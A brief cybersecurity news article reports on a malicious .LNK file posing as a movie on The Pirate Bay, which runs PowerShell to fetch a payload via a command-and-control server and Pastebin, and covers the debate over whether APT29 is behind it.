Malware Disguised as Movies on Torrent Sites Steals Cryptocurrency

A cybersecurity specialist known by the alias 0xffff0800 discovered a suspicious file being distributed on the torrent tracker The Pirate Bay. The file was listed as the movie “The Girl in the Spider’s Web,” but instead of the film, users downloaded a suspicious .LNK file containing a PowerShell command. Interestingly, at the time of discovery, 2,375 people were sharing this fake “movie.”

As soon as the fake movie file is launched, a PowerShell command is executed, which triggers a chain of other commands. This ultimately leads to the download of a payload into the %AppData% folder. Essentially, PowerShell connects to the attackers’ command and control server, which then redirects to Pastebin, where further instructions are stored.

After checking the file on VirusTotal, the specialist noticed that not all security solutions detected its suspicious activity. The researcher also suggested that the file might be linked to the well-known hacker group CozyBear (also known as APT29, CozyDuke, CozyCar, Grizzly Bear), which has used similar techniques in previous attacks.

However, Nick Carr, an expert from FireEye, disagreed with this theory. He pointed out that malicious .LNK files are used very frequently, especially to trick users of “pirate” sites, and that CozyBear is far from the only group using this method.

0xffff0800 published the .LNK file publicly so that other specialists could study it. Lawrence Abrams, founder of BleepingComputer, discovered that executing the .LNK file not only injects ads onto the Google homepage, as initially suspected, but may have additional malicious effects.